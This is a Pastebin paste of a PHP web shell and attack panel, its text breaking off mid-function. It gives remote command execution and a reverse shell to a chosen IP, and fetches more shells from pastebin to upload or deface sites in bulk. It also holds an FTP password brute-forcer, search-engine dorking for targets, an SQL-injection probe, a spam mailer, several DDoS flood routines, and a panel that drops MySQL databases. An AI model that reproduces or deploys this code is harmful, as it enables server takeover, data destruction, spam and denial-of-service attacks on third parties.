Guest User

Untitled

a guest
Jun 24th, 2017
758
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 72.22 KB | None | 0 0
  1. <?php
  2. // -----------------------------------------------------------------------coded by Vasilisk-----------------------------------------------------------------------
  3. /*$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  4. $_____________________$__________________________$
  5. $____________________$$$_________________________$
  6. $__$_________________$$$________________$________$
  7. $___$$______________$$$$$_____________$$_________$
  8. $____$$$____________$$$$$___________$$$__________$
  9. $_____$$$$$_________$$$$$________$$$$$___________$
  10. $______$$$$$$$______$$$$$_____$$$$$$$____________$
  11. $___________$$$$$____$$$___$$$$$_________________$
  12. $__$$$$$$$______$$$__$$$__$$$______$$$$$$$_______$
  13. $______$$$$$$$$____$$_$_$$____$$$$$$$$___________$
  14. $__________$$$$$$$$$_$$$_$$$$$$$$$_______________$
  15. $_________________$$$_$_$$$______________________$
  16. $_____________$$$$$___$___$$$$$__________________$
  17. $_____________________$__________________________$
  18. $_____________________$__________________________$
  19. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$*/
  20. // 'or 1=1 limit 1-- +
  21. // Приоретет: Ботнет
  22. // https://habrahabr.ru/post/249181/
  23. // http://pastebin.com/raw/qDsptDrB
  24. // https://www.youtube.com/watch?v=kyd9JdT0kio
  25. // https://habrahabr.ru/post/221871/
  26. // Приоритет: Спам
  27. // http://1337dayme.blogspot.ru/2015/02/revslider-mass-expl0iter-shell-upload.html
  28. // https://habrahabr.ru/post/313332/
  29. // https://www.youtube.com/watch?v=6wPdohKalQg
  30. // https://www.exploit-db.com/exploits/25444/
  31. // https://www.youtube.com/watch?v=dGnZnd2dUGA
  32. // http://dailyblackwork.blogspot.ru/2013/07/unix.html
  33. // https://www.hackzone.ru/articles/view/id/141/ уязвимости в php
  34. // http://pikabu.ru/story/poisk_uyazvimostey_posobie_dlya_chaynikov_2961936 HackBar http://proxy-base.com/f71/vzlom_saita_cherez_programmy-15909.html
  35. // https://forum.antichat.ru/threads/370648/ https://www.youtube.com/watch?v=9xLMtasP650
  36. ///index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
  37. // https://habrahabr.ru/company/kingservers/blog/324844/ https://freehacks.ru/showthread.php?t=429 http://www.williamspublishing.com/Books/5-8459-0785-3.html
  38.  
  39.  
  40. ini_set('display_errors', 'Off');
  41. session_start();
  42.  
  43. function mysql1(){
  44. shape1();
  45. echo "[#] Mysql_host: ".mysql_get_host_info()."<br/>";
  46. echo "[#] MySql_server: ".mysql_get_server_info()."<br/>";
  47. echo "[#] Mysql_proto: ".mysql_get_proto_info()."<br/><br/>";
  48. print '<center><h2 style="color:#ff0000">MySql</h2></center>';
  49. print '<center><form method="POST">
  50. <input type="text" name="server" placeholder="Server"><br/>
  51. <input type="text" name="user" placeholder="User"><br/>
  52. <input type="text" name="mysql_pass" placeholder="Mysql_pass"><br/><br/>
  53. <input type="text" name="table" placeholder="Table"><br/>
  54. <input type="text" name="db" placeholder="DB"><br/></br>
  55. <input type="submit" name="Connect" value="Connect">
  56. </form><br/></center>';
  57.  
  58. if(isset($_POST['Connect'])){
  59. $ms = mysql_connect($_POST['server'],$_GET['user'],$_POST['mysql_pass']);
  60. if(!$ms){
  61. echo "Error";
  62. }else{
  63. echo mysql_select_db($_POST['table'],$ms);
  64. echo mysql_drop_db($_POST['db']);
  65. echo mysql_list_dbs($ms);
  66. }
  67. mysql_close($ms);
  68. }
  69. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  70. }
  71.  
  72.  
  73.  
  74. function cmdexec($cmd){
  75. if(function_exists('system'))@system($cmd);
  76. elseif(function_exists('passthru'))@passthru($cmd);
  77. elseif(function_exists('shell_exec'))@shell_exec($cmd);
  78. elseif(function_exists('exec'))@exec($cmd);
  79. elseif(function_exists('popen'))@popen($cmd,"r");
  80. }
  81.  
  82. function info(){
  83. shape1();
  84. bingdork();
  85. print '<style>.b1 {background: Linen; color: DarkSlateGrey; font-size: 9pt; }</style>
  86. <center><form method="POST">
  87. <input type="submit" class="b1" name="mass_shell" value="Mass_shell_upload">
  88. <input type="submit" class="b1" name="deface_shell" value="Mass_shell_deface"><br/></form></center>';
  89. if(isset($_POST['mass_shell'])){echo up('http://pastebin.com/raw/90Beie2E','exploit.php');}
  90. if(isset($_POST['deface_shell'])){echo up('http://pastebin.com/raw/bRHGGFfj','deface.php');}
  91. $i = 'a';
  92. for($n=0; $n<25; $n++)
  93. {
  94. ++$i;
  95. if(scandir($i.":/")) echo "Disk: ".$i.":\<br>";
  96. }
  97. sysinfo();
  98. echo "[#] Server_ip: ".$_SERVER['SERVER_ADDR']."<br/>";
  99. echo "[#] Your_ip: ".$_SERVER['REMOTE_ADDR']."<br/>";
  100. echo "[#] Document_root: ".$_SERVER['DOCUMENT_ROOT']."<br/>";
  101. echo "[#] Server_admin: ".$_SERVER['SERVER_ADMIN']."<br/>";
  102. echo "[#] Server_soft: ".$_SERVER['SERVER_SOFTWARE']."<br/>";
  103. echo "[#] Server_port: ".$_SERVER['REMOTE_PORT']."<br/>";
  104. echo "[#] Host: ".$_SERVER['HTTP_HOST']."<br/>";
  105. echo "[#] PHP_Version: ".phpversion()."<br/>";
  106. echo "[#] Uname: ".php_uname()."<br/>";
  107. echo "[#] Mysql_client: ".mysql_get_client_info()."<br/>";
  108. echo "[#] Mysql_host: ".mysql_get_host_info()."<br/>";
  109. echo "[#] MySql_server: ".mysql_get_server_info()."<br/>";
  110. echo "[#] Mysql_proto: ".mysql_get_proto_info()."<br/><br/>";
  111. print '<style> a {text-decoration: none;} </style><body link="black" vlink="#808080" alink="#808080" bgcolor="#808080"><p><a alink="red" href="http://viewdns.info" target="_blank">[#] Reverse IP</a></p>';
  112. print '<form method="POST">
  113. <input type="text" name="pars" placeholder="site">
  114. <input type="submit" name="parsing" value="Parsing"><br/>';
  115. if (isset($_POST['parsing'])){echo file_get_contents($_POST['pars']);}
  116. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  117. }
  118.  
  119. function infophp(){ print'<javascript><a onclick="javascript:history.back(); return false;">Back to top</a>'; phpinfo();}
  120.  
  121. function exe($cmd) {
  122. if(function_exists('system')) {
  123. @ob_start();
  124. @system($cmd);
  125. $buff = @ob_get_contents();
  126. @ob_end_clean();
  127. return $buff;
  128. } elseif(function_exists('exec')) {
  129. @exec($cmd,$results);
  130. $buff = "";
  131. foreach($results as $result) {
  132. $buff .= $result;
  133. } return $buff;
  134. } elseif(function_exists('passthru')) {
  135. @ob_start();
  136. @passthru($cmd);
  137. $buff = @ob_get_contents();
  138. @ob_end_clean();
  139. return $buff;
  140. } elseif(function_exists('shell_exec')) {
  141. $buff = @shell_exec($cmd);
  142. return $buff;
  143. }
  144. }
  145.  
  146. function sysinfo(){
  147. echo '[#] '.$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "Safe Mode: ON<br/>" : "Safe Mode: OFF<br/>";
  148. echo '[#] '.$ds = @ini_get("disable_functions");
  149. echo $mysql = (function_exists('mysql_connect')) ? "MySql: ON<br/>" : "MySql: OFF<br/>";
  150. echo '[#] '.$curl = (function_exists('curl_version')) ? "CURL: ON<br/>" : "CURL: OFF<br/>";
  151. echo '[#] '.$wget = (exe('wget --help')) ? "Wget: ON<br/>" : "WGET: OFF<br/>";
  152. echo '[#] '.$perl = (exe('perl --help')) ? "Perl: ON<br/>" : "PERL: OFF<br/>";
  153. echo '[#] '.$python = (exe('python --help')) ? "Python: ON<br/>" : "Python: OFF<br/>";
  154. }
  155.  
  156. // Thanks SinonX---
  157. function perms($file){
  158. $perms = fileperms($file);
  159. if (($perms & 0xC000) == 0xC000) {
  160. $info = 's';
  161. } elseif (($perms & 0xA000) == 0xA000) {
  162. $info = 'l';
  163. } elseif (($perms & 0x8000) == 0x8000) {
  164. $info = '-';
  165. } elseif (($perms & 0x6000) == 0x6000) {
  166. $info = 'b';
  167. } elseif (($perms & 0x4000) == 0x4000) {
  168. $info = 'd';
  169. } elseif (($perms & 0x2000) == 0x2000) {
  170. $info = 'c';
  171. } elseif (($perms & 0x1000) == 0x1000) {
  172. $info = 'p';
  173. } else {
  174. $info = 'u';
  175. }
  176. $info .= (($perms & 0x0100) ? 'r' : '-');
  177. $info .= (($perms & 0x0080) ? 'w' : '-');
  178. $info .= (($perms & 0x0040) ?
  179. (($perms & 0x0800) ? 's' : 'x' ) :
  180. (($perms & 0x0800) ? 'S' : '-'));
  181.  
  182. $info .= (($perms & 0x0020) ? 'r' : '-');
  183. $info .= (($perms & 0x0010) ? 'w' : '-');
  184. $info .= (($perms & 0x0008) ?
  185. (($perms & 0x0400) ? 's' : 'x' ) :
  186. (($perms & 0x0400) ? 'S' : '-'));
  187.  
  188. $info .= (($perms & 0x0004) ? 'r' : '-');
  189. $info .= (($perms & 0x0002) ? 'w' : '-');
  190. $info .= (($perms & 0x0001) ?
  191. (($perms & 0x0200) ? 't' : 'x' ) :
  192. (($perms & 0x0200) ? 'T' : '-'));
  193.  
  194. return $info;
  195. }
  196. // ---
  197.  
  198. function backconnect(){
  199. ini_set('max_execution_time',0);
  200. if( isset($_POST['own']) && isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "" ) { echo "<p>The Program is now trying to connect!</p>";
  201. $ip = $_POST['ip'];
  202. $port=$_POST['port'];
  203. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  204. if($errno != 0) { echo "<font color='red'><b>$errno</b> : $errstr</font>"; }
  205. else if (!$sockfd) { $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>"; }
  206. else { fputs ($sockfd , "\n=================================================================\n Back Connect in PHP\n \n=================================================================");
  207. $pwd = shell_exec("pwd");
  208. $sysinfo = shell_exec("uname -a");
  209. $id = shell_exec("id");
  210. $dateAndTime = shell_exec("time /t & date /T");
  211. $len = 1337;
  212. fputs($sockfd ,$sysinfo . "\n" );
  213. fputs($sockfd ,$pwd . "\n" );
  214. fputs($sockfd ,$id ."\n\n" );
  215. fputs($sockfd ,$dateAndTime."\n\n" );
  216. while(!feof($sockfd)) {
  217. $cmdPrompt ="(Shell)[$]> ";
  218. fputs ($sockfd , $cmdPrompt );
  219. $command= fgets($sockfd, $len);
  220. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  221. }
  222. fclose($sockfd);
  223. }
  224. } else {
  225. print'<center><font style="color:#ff0000"><form method="POST">
  226. IP: <input name="ip" value="'.$_SERVER['REMOTE_ADDR'].'"/>
  227. Port: <input name="port" value="31337" />
  228. <input style="width: 90px;" name="own" type="submit" value="Connect!"/></form></font></center>';
  229. }
  230. }
  231.  
  232. function brute(){
  233. print '<body background="https://media0.giphy.com/media/lp3GUtG2waC88/giphy.gif"></body>';
  234. print '<!DOCTYPE html>
  235. <html><head><title></title></head><body><center><font color="red"><h1>DD0SHELL</h1></font></center>
  236. <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
  237. $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
  238. $user = $_GET['ftptest'];
  239. $host = $_GET['ip'];
  240. $passlist = file_get_contents('pass.txt');
  241. $port = 21;
  242. $timeout = 50;
  243. $passes = explode("\n", $passlist);
  244. $i = 1;
  245. foreach ($passes as $pass) {
  246. error_reporting(0);
  247. echo "[*] Testing " . $user . " && " . $pass . "\n";
  248. $con = ftp_connect($host, $port, $timeout);
  249. $login = ftp_login($con, $user, $pass);
  250. if (!$login) {
  251. ftp_close($con);
  252. $i++;
  253. } else {
  254. echo "Password:\n";
  255. echo "Made " . $i . " Attempts\n";
  256. echo "User: " . $user . " Password: " . $pass . "\n";
  257. break;
  258. }
  259. }
  260. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  261. }
  262.  
  263. // coded by Mr. Magnom
  264. function bingdork(){
  265. print'<style type="text/css"> textarea { width: 500px; height: 250px; border: 1px solid #000000; margin: 5px auto; padding: 7px; }
  266.  
  267. input[type=text] { padding-left: 7px; width: 250px; height: 25px; border: 1px solid #000000; background: transparent; margin: 5px auto; }
  268. input[type=submit] { height: 25px; border: 1px solid #000000; background: transparent; margin: 5px auto; color: #000000; } </style> </head>
  269. <form method="post"> Bing Dork: <input type="text" name="dork" placeholder="dork" required> <input type="submit" name="go" value=">>"> </form>';
  270. function getsource($url, $proxy) {
  271. $curl = curl_init($url);
  272. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  273. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  274. if($proxy) {
  275. $proxy = explode(':', autoprox());
  276. curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  277. curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  278. }
  279. $content = curl_exec($curl);
  280. curl_close($curl);
  281. return $content;
  282. }
  283. $dork = htmlspecialchars($_POST['dork']);
  284. $do = urlencode($dork);
  285. if(isset($_POST['go'])) {
  286. $npage = 1;
  287. $npages = 30000;
  288. $allLinks = array();
  289. $lll = array();
  290. while($npage <= $npages) {
  291. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  292. if($x) {
  293. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  294. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  295. $npage = $npage + 10;
  296. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  297. } else break;
  298. }
  299. $URLs = array();
  300. foreach($allLinks as $url){
  301. $exp = explode("/", $url);
  302. $URLs[] = $exp[2];
  303. }
  304. $array = array_filter($URLs);
  305. $array = array_unique($array);
  306. $sss = count(array_unique($array));
  307. echo "ToTaL SiTe : $sss<br>";
  308. foreach($array as $domain) {
  309. echo "http://$domain/<br>";
  310. }
  311. }
  312. print '</html>';
  313. }
  314. // --
  315.  
  316. // spamfox ---
  317. function generatemail($length = 19){
  318. $from = $_SERVER['HTTP_HOST'].'@mail.com';
  319. $email = 'abdefhiknrstyzABDEFGHKNQRSTYZ234567892001ISDNDLFJLSDOJFPAKASQGM';
  320. $numChars = strlen($email);
  321. $string = '';
  322. for ($i = 0; $i < $length; $i++) {
  323. $string .= substr($email, rand(1, $numChars) - 1, 1);
  324. }
  325.  
  326. $string = $string.'@mail.com';
  327. echo $string;
  328. $message = $_GET['mess'];
  329. $headers = $_GET['head'];
  330. $subject = $_GET['subj'];
  331. if (mail($string,$subject,$message,$headers,'-f'.$from)) {echo "Yes!!!<br/>";}
  332. $string = $string.'@mail.ru';
  333. if (mail($string,$subject,$message,$headers,'-f'.$from)) {echo "<br/>";}
  334. else {
  335. $connect = fsockopen($server, 25, $errno, $errstr, 30);
  336. fputs($connect, "Hi\r\n");
  337. fputs($connect, "MAIL FROM: $from\n");
  338. fputs($connect, "RCPT TO: $to\n");
  339. fputs($connect, "DATA\r\n");
  340. fputs($connect, "Content-Type: text/plain; charset=iso-8859-1\n");
  341. fputs($connect, "To: $to\n");
  342. fputs($connect, "Subject: $subject\n");
  343. fputs($connect, "\n\n");
  344. fputs($connect, stripslashes($message)." \r\n");
  345. fputs($connect, ".\r\n");
  346. fputs($connect, "RSET\r\n");
  347. }
  348. }
  349.  
  350. function spam1(){
  351. $message = $_GET['mess'];
  352. $headers = $_GET['head'];
  353. $subject = $_GET['subj'];
  354.  
  355. $text = file_get_contents($_GET['base']);
  356. $f = fopen('w.txt', 'w');
  357. fwrite($f, $text);
  358. fclose($f);
  359. $text = fopen("w.txt", "r");
  360. $array = null;
  361. if ($text) {
  362. while (($buffer = fgets($text)) !== false) {
  363. $array[] = $buffer;
  364. }
  365. }
  366. fclose($text);
  367. foreach ($array as $key) {
  368. echo $key;
  369. mail($string,$subject,$message,$headers,'-f'.$from);
  370. }
  371. $server = $_GET['server'];
  372. $message = $_GET['mess'];
  373. $connect = fsockopen($server, 25, $errno, $errstr, 30);
  374. fputs($connect, "Hi\r\n");
  375. fputs($connect, "MAIL FROM: $from\n");
  376. fputs($connect, "RCPT TO: $to\n");
  377. fputs($connect, "DATA\r\n");
  378. fputs($connect, "Content-Type: text/plain; charset=iso-8859-1\n");
  379. fputs($connect, "To: $to\n");
  380. fputs($connect, "Subject: $subject\n");
  381. fputs($connect, "\n\n");
  382. fputs($connect, stripslashes($message)." \r\n");
  383. fputs($connect, ".\r\n");
  384. fputs($connect, "RSET\r\n");
  385. }
  386.  
  387. function fox(){
  388. echo '<body background="https://temporarytattoos.com/pub/media/catalog/product/cache/image/700x560/e9c3970ab036de70892d86c6d221abfe/h/i/hipster-fox-temporary-tattoo-6222.jpg"></body>';
  389. print '<!DOCTYPE html>
  390. <html><head><title></title></head><body><center><h1>SPAMFOX</h1></center>
  391. <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
  392. $timei = time();
  393. $time = $_GET['time'];
  394. while (time() - $timei < $time) {
  395. echo generatemail(9);
  396. spam1();
  397. script();
  398. }
  399. }
  400.  
  401. // ---
  402. function hash1(){
  403. shape1();
  404. print "<form method='POST'>
  405. MD5: <input type='text' name='md5_code'/>
  406. <input type='submit' name='code' value='MD5'/>
  407. Sha1: <input type='text name='Sha1' />
  408. <input type='submit' name='Sha1_code' value='Sha1' />";
  409.  
  410. if(isset($_POST['code'])){
  411. echo "<p>MD5: ".md5($_POST['md5_code'])."</p>"."<br/>";
  412. }
  413. if(isset($_POST['Sha1_code'])){
  414. echo "<p>Sha1: ".sha1($_POST['Sha1'])."</p>"."<br/>";
  415. }
  416. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  417. }
  418.  
  419.  
  420. function sql_inj(){
  421. shape1();
  422. print "<center>SQL_INJECTON</center>"."<br/>";
  423. print'<center><form action="" method="POST">
  424. <input type="text" name="sql" placeholder="site">
  425. <input type="submit" value="Go "name="subm">
  426. </form></center>';
  427.  
  428. if (isset($_POST['subm'])) {
  429. $dec = substr($_POST['sql'], -1);
  430. while ($dec < 12){
  431. $dec+=1;
  432. $url = new DOMDocument();
  433. $url->loadHTMLFile($_POST['sql'].$dec."'");
  434. $url->saveHTML();
  435.  
  436. if (stristr($url->saveHTML(), 'You','have')) {
  437. echo "Yes";
  438. }elseif(stristr($url->saveHTML(), 'Sql','MySql')) {
  439. echo "Yes";
  440. }elseif (stristr($url->saveHTML(), ' ')) {
  441. echo "X?";
  442. }elseif (stristr($url->saveHTML(), 'mysql_fetch_array()')) {
  443. echo "X?";
  444. }else{
  445. echo "No";
  446. }
  447. }
  448. }
  449. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  450. }
  451.  
  452. function spam(){
  453. shape();
  454. print '<center><form method="POST">
  455. <textarea name="mess" placeholder="Message"></textarea><br/><br/>
  456. <input type="text" name="mailto" placeholder="mailto"><br/><br/>
  457. <input type="text" name="mailfrom" placeholder="mailfrom"><br/><br/>
  458. <input type="submit" name="mess1" value="Send">
  459. </form></center>'."<br/>";
  460.  
  461. if (isset($_POST['mess1'])){
  462. $email = $_POST['mailto'];
  463. $from = $_POST['mailfrom'];
  464. $subject = 'Регистрация на сайте!';
  465. $subject = "=?utf-8?b?".base64_encode($subject)."?=";
  466. $headers = "Content-Type: text/plain; charset=\"utf-8\"\r\n";
  467. $headers .= "MIME-Version: 1.0\r\n";
  468. $headers .= "From: <".$from.">\r\n";
  469. $headers .= "Reply-To: ".$from."\r\n";
  470. $headers .= "Date: ". date('D, d M Y H:i:s O') ."\r\n";
  471. $message = $_POST['mess'];
  472. if (mail($email,$subject,$message,$headers,'-f'.$from)) {print'<h2><center><p><b><font color="red">Yes</center></h2>';}
  473.  
  474.  
  475. else {echo "No!!!";}
  476. }
  477. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  478. }
  479.  
  480. // DDoS-----------------------------------------------------------------------------------------------------------------------------------------------------------
  481. function ddos(){
  482. shapeddos();
  483. if (isset($_GET['ip']) && isset($_GET['time'])){
  484. $pack = 0;
  485. $exec = $_GET['time'];
  486. $a = $_GET['ip'];
  487. $time = time();
  488. $max = $time+$exec;
  489. $host = $a;
  490. for($i=06555; $i <6555; $i++) {
  491. $mess .='x';
  492. }
  493. while (1) {
  494. $pack++;
  495. if(time() > $max){
  496. break;
  497. }
  498. $port = 53;
  499. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  500. if($fp){
  501. fwrite($fp, $mess);
  502. fclose($fp);
  503. }
  504. }
  505. }else{
  506. $host = $_SERVER['SERVER_ADDR'];
  507. $pack = 0;
  508. $exec = 8;
  509. $time = time();
  510. $max = $time+$exec;
  511. echo $host;
  512. for($i=06555; $i <6555; $i++) {
  513. $mess .='x';
  514. }
  515. while (1) {
  516. $pack++;
  517. if(time() > $max){
  518. break;
  519. }
  520. $port = 53;
  521. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  522. if($fp){
  523. fwrite($fp, $mess);
  524. fclose($fp);
  525. }
  526. }
  527.  
  528. }
  529. script();
  530. }
  531.  
  532. function ddos2(){
  533. shapeddos();
  534. $host = $_GET['ip'];
  535. $time = $_GET['time'];
  536. if(isset($_GET['ip']) && isset($_GET['time'])){
  537. $port = 80;
  538. $timei = time();
  539. $user_agent = rand(0, count($user_agents)-1);
  540. $packet = "GET $url HTTP/1.1\r\n";
  541. $packet .= "Host: $host\r\n";
  542. $packet .= "Keep-Alive: 900\r\n";
  543. $packet .= "Cache-Control: no-cache\r\n";
  544. $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
  545. $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  546. $packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
  547. $packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
  548. $packet .= "Connection: keep-alive\r\n";
  549. $packet .= "User-Agent: $user_agent\r\n\r\n";
  550. while (time() - $timei < $time) {
  551. $handle = fsockopen($host, $port, $errno, $errstr, 1);
  552. fwrite($handle, $packet);
  553. }
  554. }else{
  555. $host = $_SERVER['SERVER_ADDR'];
  556. echo $host;
  557. $time = 8;
  558. $port = 80;
  559. $timei = time();
  560. $user_agent = rand(0, count($user_agents)-1);
  561. $packet = "GET $url HTTP/1.1\r\n";
  562. $packet .= "Host: $host\r\n";
  563. $packet .= "Keep-Alive: 900\r\n";
  564. $packet .= "Cache-Control: no-cache\r\n";
  565. $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
  566. $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  567. $packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
  568. $packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
  569. $packet .= "Connection: keep-alive\r\n";
  570. $packet .= "User-Agent: $user_agent\r\n\r\n";
  571. while (time() - $timei < $time) {
  572. $handle = fsockopen($host, $port, $errno, $errstr, 1);
  573. fwrite($handle, $packet);
  574. }
  575. }
  576. script();
  577. }
  578.  
  579. function ddos3(){
  580. shapeddos();
  581. $host = $_GET['ip']; // ipslow
  582. $port = 80;
  583. $time = $_GET['time'];
  584. $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
  585. $timei = time();
  586. $fs = array();
  587. while (time() - $timei < $time) {
  588. for ($i = 0; $i < 100; $i++){
  589. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  590. fwrite($fs[$i], $headers);
  591. }
  592. while (time() - $timei < $time) {
  593. for ($i = 0; $i < count($fs); $i++) {
  594. if (!$fs[$i]){
  595. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  596. fwrite($fs[$i], $headers);
  597. }
  598. fread($fs[$i], 1);
  599. }
  600. sleep(mt_rand(0.5, 2));
  601. }
  602. script();
  603. }
  604. }
  605.  
  606. function ping($host, $port, $timeout){
  607. $tB = microtime(true);
  608. $fP = fSockOpen($host, $port, $errno, $errstr, $timeout);
  609. if (!$fP) { return "down"; }
  610. $tA = microtime(true);
  611. return round((($tA - $tB) * 1000), 0)." ms";
  612. }
  613.  
  614. function ddos4(){
  615. shapeddos();
  616. $host = $_GET['ip']; //iping
  617. echo ping($host, 80, 10);
  618. cmdexec("ping -f $host");
  619. script();
  620. }
  621.  
  622. function doSlow(){
  623. shapeddos();
  624. $timei = time();
  625. $host = $_GET['ip']; //dohost
  626. $time = $_GET['time'];
  627. $i = 0;
  628. for ($i = 0; $i < 100; $i++) {
  629. $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
  630. }
  631. while ((time() - $timei < $time)) {
  632. for ($i = 0; $i < 100; $i++) {
  633. $out = "POST / HTTP/1.1\r\n";
  634. $out .= "Host: {$host}\r\n";
  635. $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  636. $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
  637. $out .= "X-a: " . rand(1, 10000) . "\r\n";
  638. if (@fwrite($fs[$i], $out)) {
  639. continue;
  640. } else {
  641. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  642. }
  643. }
  644. }
  645. script();
  646. }
  647.  
  648. function ddos5(){
  649. shapeddos();
  650. $iii = $_GET['ip'];
  651. $ppp='80-53-443';
  652. $time = $_GET['time'];
  653. $timei = time();
  654. if(isset($_GET['ip'])){
  655. $ar_por=explode('-',$ppp);
  656. while (time() - $timei < $time) {
  657. foreach($ar_por as $por)
  658. {
  659. $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
  660. if ($fp)
  661. {
  662. stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
  663. @fclose($socket);
  664. }
  665. }
  666. }
  667. }else{
  668. $host = $_SERVER['SERVER_ADDR'];
  669. $time = 8;
  670. $timei = time();
  671. $pack = "";
  672. echo $host;
  673. for ($i=0; $i <6500 ; $i++) {
  674. $pack += "11212";
  675. }
  676. while (time() - $timei < $time) {
  677. $handle = fsockopen($host, $port, $errno, $errstr, 1);
  678. fwrite($handle, $pack);
  679. }
  680. }
  681. script();
  682. }
  683.  
  684. function ddosintel(){
  685. $host = $_GET['ip'];
  686. $pps = 5000;
  687. $tune = 125;
  688. $uslp = (1000000 / $pps) - $tune;
  689. if($uslp < 0)
  690. $uslp = 0;
  691. for ($i=6500000; $i > 0 ; $i--) {
  692. $port = rand(1025, 65535);
  693. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  694. fwrite($fp, $i);
  695. fclose($fp);
  696. usleep($uslp);
  697. }
  698. script();
  699. }
  700.  
  701. function attack_http() {
  702. shape();
  703. $host = $_GET['host'];
  704. $server = $_GET['server'];
  705. $mthd = $_GET['mthd'];
  706. $port = 80;
  707. $time = 7;
  708. $timei = time();
  709. $fs = array();
  710. $request = "$mthd / HTTP/1.1\r\n";
  711. $request .= "Host: $host\r\n";
  712. $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
  713. $request .= "Keep-Alive: 900\r\n";
  714. $request .= "Accept: *.*\r\n";
  715. $timei = time();
  716. for ($i = 0; $i < 100; $i++) {
  717. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  718. }
  719. while ((time() - $timei < $time)) {
  720. for ($i = 0; $i < 100; $i++) {
  721. if (@fwrite($fs[$i], $request)) {
  722. continue;
  723. } else {
  724. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  725. }
  726. }
  727. }
  728. script();
  729. }
  730. // ddos post---------
  731.  
  732. if($_POST['dos'] == 'tcp'){
  733. $iii = $_POST['ip'];
  734. $ppp='80-53-443';
  735. $time = $_POST['time'];
  736. $timei = time();
  737. if(isset($_POST['ip'])){
  738. $ar_por=explode('-',$ppp);
  739. while (time() - $timei < $time) {
  740. foreach($ar_por as $por)
  741. {
  742. $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
  743. if ($fp)
  744. {
  745. stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
  746. @fclose($socket);
  747. }
  748. }
  749. }
  750. }
  751. script();
  752. }
  753.  
  754. $iii = $_POST['ip2'];
  755. $ppp='80-53-443';
  756. $time = $_POST['time2'];
  757. $timei = time();
  758. if(isset($_POST['ip2'])){
  759. $ar_por=explode('-',$ppp);
  760. while (time() - $timei < $time) {
  761. foreach($ar_por as $por)
  762. {
  763. $fp = stream_socket_client("tcp://$iii:$por", $errno, $errstr, 30);
  764. if ($fp)
  765. {
  766. stream_socket_sendto($fp, 'data',STREAM_CLIENT_ASYNC_CONNECT);
  767. @fclose($socket);
  768. }
  769. }
  770. }
  771. script();
  772. }
  773.  
  774.  
  775. if($_POST['dos'] == 'd'){
  776. $timei = time();
  777. $host = $_POST['ip'];
  778. $time = $_POST['time'];
  779. $i = 0;
  780. for ($i = 0; $i < 100; $i++) {
  781. $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
  782. }
  783. while ((time() - $timei < $time)) {
  784. for ($i = 0; $i < 100; $i++) {
  785. $out = "POST / HTTP/1.1\r\n";
  786. $out .= "Host: {$host}\r\n";
  787. $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  788. $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
  789. $out .= "X-a: " . rand(1, 10000) . "\r\n";
